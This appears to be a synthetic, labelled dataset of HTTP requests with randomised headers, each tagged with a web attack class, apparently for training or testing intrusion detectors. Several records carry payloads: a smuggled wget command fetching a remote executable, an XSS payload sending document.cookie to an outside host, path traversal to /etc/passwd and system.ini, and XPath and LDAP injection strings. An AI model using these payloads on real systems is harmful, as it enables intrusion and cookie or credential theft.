POST /nhronifshaaorys/gi8bcfabtSwsftnitso/tLnR/y0dTH57QLjY..png? HTTP/1.1
Content-Length: 194
Content-Language: RYom,icrruthe,nrt
Content-Encoding: deflate
Content-Location: http://exsre.de/mbaw/adwop.jpeg
Content-MD5: dGN0dHNpYnNhbHJFbGJrdA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 03 Nov 06 19:03:49 GMT
Host: 171.226.161.206
Connection: keep-alive
Accept: text/html, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: file:///x:/duie/ad/mcc.xml
Cache-Control: no-cache
Cookie2: $Version="6"
Date: Fri, 19 Jun 09 07:55:15 UTC
ETag: W/"laMw64Hrs9TeG827Xhq"
Expect: 100-continue
If-Modified-Since: Sat, 24 Jan 09 14:44:59 CET
If-Unmodified-Since: Sat, 26 Dec 09 12:35:17 CET
If-Match: *
If-None-Match: "Gs7@JHnKw4yfCO3IkUFE"
If-Range: Sat, 05 Mar 05 17:26:33 UTC
Max-Forwards: 9
Pragma: nRu=eIe
Proxy-Authorization: Digest nonce
Authorization: Basic Y2hTZXJzbDplcmVkbQ==
Referer: /etdreet/ritgambc/dictiem.pl
TE: trailers,trailers,chunked;q=0.4
Trailer: Host
User-Agent: rinoimlufatmuincoze
UA-CPU: MIPS
UA-Disp: 2107,9103,32
UA-OS: Mac OS X
UA-Color: color32
Via: 5.8 54.114.50.162, 7.4 217.42.35.69, 3.3 94.182.63.145
Transfer-Encoding: gzip
Upgrade: dNix/2.9, yo3i/4.7, mek/5.0, khgg/9.0
Warning: 174 www.sM1aetn.tiff "fuoj8nrxzwrerIn" "Sun, 04 Nov 07 17:55:53 UTC"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lues=m$s&f9imvGXBO=fmyNF&ic5rmx7OGCy=tUeaehdrdioe&ZxFnt=oauniseee&dr0psqhalleSjr=4_F-z&ueloet4rBtdangu=8852010&a0Pd0zUWjKt=uandeur&anceeuzh=c9group by<l&bediaettph=pnOXV&mrcQxteiqtettrr=nZO8

End - Id: 45024
Start - Id: 43059
class: OsCommanding
POST /fDHUUz5iTyHj/xDbfaneroamnwq/CnaeemihogaHhsrtyha4.html? HTTP/1.0
Content-Length: 92
Content-Language: m,oUh,1
Content-Encoding: gzip
Content-Location: /ergms/ldEt/blEt.nsf
Content-MD5: dGVhZWRlaDZoc29vQWhzag==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 02 Feb 07 12:20:49 UTC
Last-Modified: Sat, 08 Jul 06 24:33:46 GMT
Host: www.nM9oogog.be:80
Connection: keep-alive
Accept: image/png, application/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 106.223.101.99
Cookie: e6oyoKAnw2c=it5nshutdown=oM;qiLTyKfNaZkI=420907
Cookie2: $Version="6"
Date: Mon, 12 Jan 09 20:58:20 CET
ETag: "CkQ3nAB.xUzhBzs5jox_"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Wed, 02 Nov 05 16:43:46 CET
If-Unmodified-Since: Sun, 28 Jun 09 02:18:18 UTC
If-Match: "QL1Ivc@iqjP4N6rHlA8"
If-None-Match: "_eNPjrb3jxnMW0ToH"
If-Range: Thu, 19 Nov 09 12:17:54 UTC
Max-Forwards: 45
MIME-Version: 1.8
Pragma: i0nedc5='eiy'
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Basic cGFrZVNsTzpvZWZ0MzR3aQ==
Range: -324,1-544,8-732
Referer: http://www.o6fedomR.be/c1s8/unI5hYn/Pverh/mt1ipdU.jpg
TE: deflate
Trailer: Accept
User-Agent: Mozilla/1.8 (X11; U; SunOS sun4u 3.0; 0e-ht; rv:1.5.9) Gecko/30576824
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: qt8W/5.1 250.75.68.214, FTP/3.6 www.tinnw.jpeg
Transfer-Encoding: identity
Upgrade: tun3o/7.3, omna/4.0
Warning: 822 www.eio8o.jpg "ftuhtoaegstt66xnrce" "Tue, 28 Jul 09 22:26:56 GMT"
X-Forwarded-For: 214.245.16.235
X-Serial-Number: 13504238814
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eiie=787621475&5ouo=;id&shtsq=9024393&1CE9I=636&wctmp@HF=encefhtsduaie&5tz=aueteEyoyirvcbs

End - Id: 43059
Start - Id: 43256
class: OsCommanding
GET /oQxy8PLSJ/CapysdmohiiLenomrs/iztao/lTta5ooo0acyfp/uplyqEzX_h/rKl70hgTUjx_V2UqroDY/jtidejeped.exe?ntCE5cTnrr=buxMyU979&eeckehrtrlU8Urs=Slkpsm%3Btn&SStndi=m&sEmE=828&aiCo=6&itn=n5tye3ubpNhxy&NOou=yyhoheNLeAj&xkwuntehsd0a=%5Cn+++++wget++++http%3A%2F%2F130.49.12.228%3A03457%2Fnftp.exe HTTP/1.0
Host: 58.160.236.8:1951
Connection: bdn1frEd
Accept: image/*, image/png;q=0.7
Accept-Charset: us-ascii;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 234.82.248.6
Cookie: eWce=ataad(6emc;hessuno4sdca=iru1toeB
Cookie2: $Version="54"
Date: Thu, 22 Apr 10 15:37:25 UTC
ETag: W/"4OevjYPAXE2q_Wfy7"
Expect: 100-continue
From: ejAo@hngo.biz
If-Modified-Since: Wed, 20 Jul 05 07:28:22 CET
If-Unmodified-Since: Fri, 20 Apr 07 22:25:54 UTC
If-Match: "Qh1YHB@JYy05@Czu"
If-None-Match: *
If-Range: "Jp697HNy5stJm.NTpUy"
Max-Forwards: 3241
MIME-Version: 8.0
Pragma: r2='hqt'
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: Basic ZG50b2VlOnRzbm50Nm9l
Range: -640387
Referer: /eewZd/tOlt3eb/b3jesetr/atdlnm.cfm
TE: chunked;q=0.1,trailers,trailers
Trailer: If-Range
User-Agent: nwt8asbft
UA-CPU: 68000
UA-Disp: 9170,0027,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 115x099
Via: 6.5 79.227.7.148, 7.9 www.y7ahkol.htm
Transfer-Encoding: deflate
Upgrade: lnphe/4.9
Warning: 865 www.tCxceo.shtml "dydtrSr7Wtth" "Fri, 09 Jul 04 12:15:54 GMT"
X-Forwarded-For: 228.91.246.96
X-Serial-Number: 855673274232810386
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43256
Start - Id: 45241
class: PathTransversal
GET /./? HTTP/1.0
Host: 17.178.189.21
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 172.49.251.232
Cookie: Bv7system-Qconnectq=n>h;bgsoundBhttpnRs0sQ=tflo;tebvet=|actnibM> like
Cookie2: $Version="071"
Date: Fri, 04 Aug 06 05:39:15 UTC
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: 100-continue
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 26 Apr 10 02:37:03 UTC
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "ZeUMHVkrw.uVUbox3"
If-Range: Thu, 26 Feb 09 18:52:01 CET
Max-Forwards: 611
MIME-Version: 3.6
Pragma: raayo5=trAnsspa
Proxy-Authorization: Digest qop=evai40
Authorization: Digest opaque="jsq0"
Range: 220-5761,42620-
Referer: http://talzqtd.be/unEeF.jpeg
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: beead9elepoinetti
UA-CPU: x86
UA-Disp: 568,3282,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: 4.4 176.45.158.137, FTP/3.3 144.100.8.10
Transfer-Encoding: compress
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 67855229
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45241
Start - Id: 47654
class: XSS
GET /l3PRQQLlGmg/mDtKR3LL1AK4Dkt3Ep/e9/dR.fq_X0Yz_WQwp/5Jc_@wfa0EI-QD/oDuaekwArtonDen/oht/a1_y470-/slumrstvwnygtlo/ec/uttfnhnrbisdaE.jsp?mGjot9ce=AOat2actOZmiw6&n6oRTfipo=yeclocationSLl%3Cacceptu&eetineq=28278198&hitow8kufsste=attexterm+i+c&Frp=aCJJh&6e=kpets&essncw3ca=%3Cimg+++++src++%3D+++%22+++measerma%3E+++++%22+++++onmouseover++%3D++++%22%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ni.com%2Fcgi-bin%2Fatil.cgi%27%2Bdocument.cookie%29%3B%5D%22+%3E&ibxsrei=i3teeteneoo2nstt9 HTTP/1.0
Host: 116.167.102.93
Connection: zaeavf
Accept: application/*, video/quicktime, text/*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 168.210.69.11
Cookie: niEg4garrmtihf=hL3z7r;cy8Tfhl=iepunrgenc;kOoHrfutD=tZ3QP;bcenesRq=692180;xRAdoAEh=1w1tm;L6GkanE=8801064
Cookie2: $Version="8"
Date: Thu, 14 Jun 07 24:40:36 UTC
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: varybo=Gdejuu9m;vcuie=deknnr
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: NTLM Y1RkYnJleXZkdWNtRWloeWRia2hYc29Ob3RnY21KdHg2MXdwZXpFc3R1Y3YyZQ==
Authorization: Basic ZUl0Mzppb2F0c2xP
Range: 51-,059585-
Referer: http://aoorez.cz/iSoerit9/yitkeb.msf
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: From
User-Agent: Mozilla/5.4 (X11; U; Linux i586 8.9; ro-in; rv:9.0.0) Gecko/82820811
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: i7c/3.7 195.5.126.43, 6.5 79.232.210.240
Transfer-Encoding: es9es
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47654
Start - Id: 35554
class: XPathInjection
PUT /QgJye4h/sPD0Uksll7/9otaee/vQ-r_Zf_v_/oicveCh38radeter/5R1W2RjqlogTUpS/vKcBGqservicesfS.SU/ouGmQ/zhrEtfcdgjGadqah.shtml? HTTP/1.1
Content-Length: 282
Content-Language: wt01scun,Ritn,r5Izi8
Content-Encoding: identity
Content-Location: http://muots.org/sat4d2a.pl
Content-MD5: YVJ0ZWVnc2hvZXJtdzB0Yw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 20:59:35 GMT
Last-Modified: Thu, 22 Nov 07 05:13:18 GMT
Host: 125.201.18.211
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 0.191.150.195
Cookie: Ohna=ehuSja@pey;ur33ltsnAalt=szinhr05fm;bt=z@vqoI;MdYnodeAhftpeval=0nadamo
Cookie2: $Version="447"
Date: Tue, 25 Nov 08 03:43:26 UTC
ETag: "-FwfO-oPyhjIc7MMKhL"
Expect: 100-continue
From: 8ty7e@ti3yral5l.de
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Fri, 02 Dec 05 23:20:52 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Sep 04 02:45:40 GMT
Max-Forwards: 2
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: len2te ytHaNuew=yalote
Authorization: NTLM U3ZOYUNzdG5lZnE4d2V5cGZxTmNzbnByYWxlVzZvTWFyNHRvdGhzcw==
Range: 1158-964,-612192
Referer: http://rouo6.cz/wo60ss/sssbtUen.zip
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/4.7 (compatible; msanF1wn1n; Open BSD i386; iaz7)
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-OS: Windows 98
UA-Pixels: 1921x126
Via: FTP/3.7 www.he2enh.jpg:9
Transfer-Encoding: gzip
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 379 242.161.5.159:2 "DteoasHpihrrtciR" "Sun, 24 Jan 10 21:24:17 GMT"
X-Forwarded-For: 20.224.84.217
X-Serial-Number: 42337082181389056
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rod8RjaHh=o5breplacecngcnodek7&o0m=morEhtiin&rtiothbos0g=tebyvagy &fta2n5aDr6=0029&dwsiuysehsj=hf_D&aRnso2c1iih02tk=ernelme3oatbio&i0aeaetcmitpR=gsea'   or     ee9hee/ela/child::node()[processing-instruction()=31]  or     'gret'   =    '&i4fld=Abinai

End - Id: 35554
Start - Id: 44719
class: PathTransversal
PUT /ouc-HZ1eH8.shtml? HTTP/1.0
Content-Length: 104
Content-Language: aiei,as,retg
Content-Encoding: gzip
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: cmJubGx0c3NhbW9mZWVabg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Wed, 13 Dec 06 24:31:10 UTC
Host: 219.124.78.88
Connection: close
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: identity, deflate, deflate;q=0.9, compress;q=0.4, compress;q=0.3
Accept-Language: respEie-ess, ixt-1aadirvo, Houlrmt-rc, oc-fscvpj;q=0.5, d-jnnih
Cache-Control: min-fresh=5011
Client-ip: 230.63.102.101
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Wed, 18 Mar 09 14:13:39 CET
ETag: W/"iZhuf9TR391qS9y6Uib"
Expect: iLhe
From: eeisiew@psau3afeg.net
If-Modified-Since: Sat, 28 Jun 08 18:53:00 GMT
If-Unmodified-Since: Fri, 19 Jan 07 21:46:30 CET
If-Match: "@LXcCAi1c4l2MblH"
If-None-Match: *
If-Range: Sat, 23 Feb 08 14:11:33 UTC
Max-Forwards: 65
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: Digest nonce
Range: 8542-,-709
Referer: http://ftiitolo.ch/haomnfb2/r7dwy6/awPc/rodSn/nIbocoe.mpg
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: yntarh (oDXSwU)
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 253x4084
Via: uineao/6.9 241.17.136.210:836, 1.6 228.39.59.211
Transfer-Encoding: ieem
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 548 48.64.9.229 "1rslwi8n3tavcnajanu" "Fri, 11 Sep 09 17:43:47 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

drvis992wenjBzr=254915718&l4iehf=./../../../../../&tautoexec9Y11Hixv1Q=e<&Uk2netcatdIj=657

End - Id: 44719
Start - Id: 35831
class: XPathInjection
GET /aIcgomag/_O/rj/MS/eha3l/ls2mrt/D5IDAallWAKG1winntwWz.sh?e3eTxshi7tet=%28i+++%3C+count%28cr%2Fchild%3A%3Atext%28%29%29+++and++j+++%3C++++count%2872%2Fchild%3A%3Acomment%28%29%29+++++and+k++++%3C+count%28dk%2Fchild%3A%3A*%29+++++%29&hnnfrslh=bcrsR&iiexbattuthtomf=lPe&QCxwindow.open-MselectR7OWS=+&em8eaeoDbieehn=tQ%40voqq&kir6aNT4=72954987&3Tiszbl0Oh=kPYys2on&BD6ZlyUr=chmSs7ment9ablhpno&RriP=1840&psTvooimrtxo=%28ohmatA HTTP/1.0
Host: 81.197.65.71
Connection: close
Accept: image/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8, compress;q=0.8, gzip, compress;q=0.6
Accept-Language: *;q=0.8
Cache-Control: dkealjei=st6Hi
Client-ip: 48.181.108.67
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="38"
Date: Mon, 28 Jun 04 09:56:09 GMT
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: hi5otp
From: iroIe4wg@epmy.com
If-Modified-Since: Thu, 01 Sep 05 04:22:16 GMT
If-Unmodified-Since: Thu, 30 Apr 09 14:55:09 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 01 May 04 12:41:55 GMT
Max-Forwards: 7
MIME-Version: 0.9
Pragma: taliu=rnh
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="ptan"
Range: 77-,-9
Referer: http://se9ogo.be/axngsr/ro2rl2/may1nrn/erays6/eeye.asp
TE: chunked,deflate;q=0.7
Trailer: Connection
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 8.3; 20-w0; rv:5.6.3) Gecko/12306776
UA-CPU: MIPS
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: oCo/8.6 www.9eSnasaf.css:6
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 690061163058
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35831
Start - Id: 38329
class: LdapInjection
GET /ema6E94@SMFypnyd@ruY/ifuWN4Pf/hGWngTJmAqMkSXQqXWC/ul2yearcal6aDwIsajn/rpuPlz80HJH/dtUMYiMhBG-sNEwS4Dh/oUtedcthc9ni/2o/mU7TcW66y7eamu5IOS/ZL6aaq/ihie8wStdtasler/fPQs78rO7mbf8uByL.jpg?ysfnd=%29++%28++%7C%28nq%3Dfed*%29&HIoltnA=sawwt&wiucs=9731&weiaoui2lt=g+%3B&neen=ceuge60te&aau1ae6Oegu=+e8&nmM1epc=hne78suxwqNrtrvdh&DANKUEfjClink=iOg_&oit=egHtazeoaoo9enl HTTP/1.0
Host: 235.69.232.175
Connection: diomtt
Accept: video/mpeg, application/rtf
Accept-Charset: windows-874, macintosh, windows-1254, iso-2022-kr;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale
Client-ip: 83.209.156.197
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="689"
Date: Fri, 08 May 09 18:58:26 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: atq5uIk=lcLmsuZ;i3ece4=Swd7rg
From: ze0mxcoe@eemraasrs.com
If-Modified-Since: Wed, 14 Jan 09 17:32:09 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:14:20 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 879
MIME-Version: 8.3
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: ene3e tBebc=fcidjwou
Range: -717,218781-
Referer: /Eegedee/iieaE/Imly.mp3
TE: gzip;q=0.1
Trailer: If-Unmodified-Since
User-Agent: 99mh (taDRLUtX; oTRR.C4)
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: deflate
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38329
Start - Id: 45422
class: PathTransversal
POST /delete10Q1x5/ykj_52Q3/7Dd5u4cauuhespeiljt3/74tagLPin6BKVe2/3sitzmOg2wh0ocpO/r5JU/thJhL7@y89q-U/ga.jpeg? HTTP/1.0
Content-Length: 91
Content-Language: eatuBerf,trRsumhn,8s
Content-Encoding: identity
Content-Location: http://Almitrsn.de/tawesth/imqa/ss1oTi/tcthds/eeps.sh
Content-MD5: M2c2dHRlbmhrbnRyM25hTw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 May 04 09:48:32 UTC
Last-Modified: Tue, 15 Nov 05 23:14:13 UTC
Host: 52.24.138.161:9782
Connection: 7eoe9ac
Accept: image/png, image/*, application/zip
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.5
Accept-Language: *;q=0.3
Cache-Control: max-stale=8104
Client-ip: 186.229.57.172
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="79"
Date: Sat, 09 May 09 21:26:30 GMT
ETag: W/"YIv7-YIQ3UOzG@Xq"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 31 May 08 21:00:31 CET
If-Unmodified-Since: Sat, 22 Oct 05 08:46:52 UTC
If-Match: "UEz5I0Gr9q@D7yhf"
If-None-Match: *
If-Range: "5CdIAaHaeVtVnd1IP"
Max-Forwards: 9
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Basic amR6cnNrcjp0ZXJ0
Range: -292636,082693-
Referer: /i06gS/bi9Nd/oa7pu/2Li6.wmn
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/1.8 (compatible; Konqueror/1.0; Mac OS X; wehensio; y7ale; eienntS)
UA-CPU: PowerPC
UA-Disp: 282,5050,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 863x2272
Via: HTTP/5.4 www.isiktvkv.css:4322
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ene6u5awmdd=etsock_stream9+[Sfromcopy&LsJk5q3fVK=..\..\..\..\WINNT\system.ini

End - Id: 45422
Start - Id: 45478
class: PathTransversal
GET /yetsieoysnh1ssmay/NvuoNmwimnhDiHtBl/y2hSrMrgnbga/Odelete9m4T6a/hM/tgdpi1WysqBlU7/abmePCO-d762/nIDDHLT/cYU/m19.html?teuec=qmAY7x1mkBXu&480ctcFoc=98&efuigyphtTob=36151064&hashh=mceeb1%2Bej%7E&zs=8tgi&1qas=331421&ayofwe7=%5CWINNT%5Csystem.ini HTTP/1.0
Host: 224.131.125.24:34318
Connection: O0set
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 7iid6-zeiIeLie, ae-ms4ofh;q=0.1, 8Uha-e, az-tt;q=0.0, il1sby8-erpsa;q=0.0
Cache-Control: min-fresh=6
Client-ip: 150.150.63.42
Cookie: peidlues=6T2-vnbrUJP;tret6wtaahcceth=0051
Cookie2: $Version="01"
Date: Sun, 30 Nov 08 16:08:36 GMT
ETag: "u_g0XiWobOrZHoGp"
Expect: 100-continue
From: 9lho@aiRe.net
If-Modified-Since: Sun, 31 Dec 06 20:05:24 GMT
If-Unmodified-Since: Thu, 16 Sep 04 12:26:43 GMT
If-Match: "IF0MoCAR@dw@D2VDn92"
If-None-Match: "f1FQh7EwzZnLTMGpX8"
If-Range: Fri, 13 Oct 06 02:36:22 CET
Max-Forwards: 682
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: Digest username="hesa"
Authorization: nqsz drac2x=aoeIrr
Range: 7-
Referer: /3tno/ec51Ur/qhryi.jsp
TE: trailers,trailers,deflate;q=0.8
Trailer: Referer
User-Agent: ornteaIvxttect
UA-CPU: x86
UA-Disp: 3626,740,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 5163x468
Via: FTP/2.9 223.210.147.184, FTP/5.7 www.dgESoui.png, 7.6 www.bo3t0es.jpg
Transfer-Encoding: identity
Upgrade: drf/1.3, eoe/9.9
Warning: 126 www.bm57.shtml "tust8ovdsrl" "Tue, 15 Jan 08 10:20:10 CET"
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45478
Start - Id: 46351
class: PathTransversal
GET /44betweenrEE6qPsystemG/Wrqchild.update/otUEeolneeioLycII/cRIdxqrPzpw.yAdUDQqF/uQUBOlikejA9wZshutdownWm7/7ia5nt5mj8h/hla/i4Zk3/a37x6@8WoEaj_/gtosdrSrtneemefz.png?daooa2osiutem=8&rdte=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&088k=22&7omeoj=E&AiO=rnmtDqdc&prRTdae=wBP8&jod3i=Uo7&tmpsVtbinDcopyWn=9&MK98WJEj=htmpw%3Aney%2FieleT&idL1f2CG=e%7C%29%251&RXCexecU=dhnees+udiymuf&eospt2iMIeahgw=ndivul HTTP/1.1
Host: www.0mfalh8eo9.be
Connection: keep-alive
Accept: application/*, text/*;q=0.4, video/mpeg;q=0.8
Accept-Charset: *
Accept-Encoding: gzip, deflate, gzip
Accept-Language: Einn-5eeg
Cache-Control: max-age=92
Client-ip: 51.115.37.124
Cookie: rhbet=nl(;hr=leuisnVema ?;occ=3E;1bqdriyA=t<;httpsRnc56.Jls=lbenMrteac
Cookie2: $Version="19"
Date: Sun, 05 Feb 06 24:53:18 UTC
ETag: W/"iS.lsM4a5lrac@V_Cu"
Expect: 100-continue
From: dB62@isuoongs1.org
If-Modified-Since: Thu, 15 Jun 06 11:09:37 UTC
If-Unmodified-Since: Wed, 27 Jan 10 07:51:17 GMT
If-Match: "Aw1QgKMgfJRrHaYSr0a"
If-None-Match: "rKUAANKDBvP73oT"
If-Range: *
Max-Forwards: 4
Pragma: hbntrc='i'
Authorization: Digest algorithm=MD5-sess
Referer: http://www.hga0k2.cz/tacjEta/eetnuace.fgf
TE: chunked,trailers,chunked
Trailer: Authorization
User-Agent: Mozilla/9.3 (Windows; U; Windows NT 6.6; aa-oo; rv:0.7.0) Gecko/24545948
UA-CPU: StrongARM
UA-Pixels: 648x2225
Via: FTP/7.4 www.tstt54s4.htm:607, FTP/4.5 100.143.228.214, 6.9 www.adUe.js
Transfer-Encoding: deflate
Warning: 915 23.102.86.169 "8rrnetn" 
X-Forwarded-For: 67.104.67.27
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46351
Start - Id: 38091
class: LdapInjection
GET /tnlrndtXbint/KbUNbAkTXreplaceG-2_/Nb/ntnedoqc/s6P9UplE/ouneTcfnJot6iahettH/dqKJ@V9etcFgc7/gjkJNENkqvSHhaz/gFREFjU42VVfp/fvlwpe/Swp-rcv@oHQWmeta.png?h3Nhtacces83s_=+c+D8&eegflahel=epaZ1ud&ztrh=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&shee=o2e+%2FS+%3Caan HTTP/1.1
Host: 42.7.124.84
Connection: keep-alive
Accept: video/quicktime;q=0.0, text/html;q=0.0
Accept-Charset: cp-950;q=0.9
Accept-Encoding: *
Accept-Language: e-l, ueoerm-W;q=0.2
Cache-Control: no-store
Client-ip: 209.94.206.107
Cookie: vHuabrUdnsE=02854068;t5n=25;o1amlwrMnr=e;zay07zzrlMt=7448624;aZqSCrr6itql=iRlKa
Cookie2: $Version="74"
Date: Mon, 09 Oct 06 10:43:16 UTC
ETag: W/"WFlRn2_F0qiz2qXuNMV"
Expect: 100-continue
From: oaitn@wnslnp.com
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 05 Jun 04 20:20:03 UTC
If-Match: *
If-None-Match: "VY4b1@kUvPJqLaX@SG"
If-Range: Fri, 27 Nov 09 03:06:26 CET
Max-Forwards: 9
MIME-Version: 7.3
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: Basic VDQ5QTpieGVt
Authorization: Basic dXRldHM6eVRhZ2lobGg=
Range: 77-,76-
Referer: http://www.l4etp.be/zEs3/igwex8id/binstb/m6oI/mHOPAao.cgi
TE: deflate,trailers
Trailer: Pragma
User-Agent: XttsWgtrm
UA-CPU: 68000
